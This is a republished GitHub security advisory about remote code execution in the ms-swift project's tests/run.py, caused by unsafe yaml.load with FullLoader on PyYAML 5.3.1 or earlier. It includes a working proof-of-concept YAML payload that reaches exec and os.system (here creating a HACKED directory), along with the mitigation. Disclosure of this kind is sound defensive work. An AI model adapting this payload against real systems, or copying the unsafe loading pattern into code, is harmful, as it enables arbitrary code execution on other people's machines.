MS SWIFT Remote Code Execution via unsafe PyYAML deserialization

链接: https://github.com/advisories/GHSA-fm6c-f59h-7mmg

仓库 Star: 9003

参考链接:

描述:

Description

A Remote Code Execution (RCE) vulnerability exists in the modelscope/ms-swift project due to unsafe use of yaml.load() in combination with vulnerable versions of the PyYAML library (≤ 5.3.1). The issue resides in the tests/run.py script, where a user-supplied YAML configuration file is deserialized using yaml.load() with yaml.FullLoader.

If an attacker can control or replace the YAML configuration file provided to the --run_config argument, they may inject a malicious payload that results in arbitrary code execution.

Affected Repository

Vulnerable Code

1
2
3
if args.run_config is not None and Path(args.run_config).exists():
    with open(args.run_config, encoding='utf-8') as f:
        run_config = yaml.load(f, Loader=yaml.FullLoader)

Proof of Concept (PoC)

Step 1: Create malicious YAML file (exploit.yaml)

1
2
3
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"

Step 2: Execute with vulnerable PyYAML (<= 5.3.1)

1
2
3
4
import yaml

with open("exploit.yaml", "r") as f:
    cfg = yaml.load(f, Loader=yaml.FullLoader)

This results in execution of os.system, proving code execution.

Mitigation

  • Replace yaml.load() with yaml.safe_load()
  • Upgrade PyYAML to version 5.4 or later

Example Fix:

1
2
3
4
5
# Before
yaml.load(f, Loader=yaml.FullLoader)

# After
yaml.safe_load(f)

Author

安全公告
#Github Advisory
MS SWIFT Remote Code Execution via unsafe PyYAML deserialization
http://example.com/2025/07/31/github_247744109/
作者
lianccc
发布于
2025年7月31日
许可协议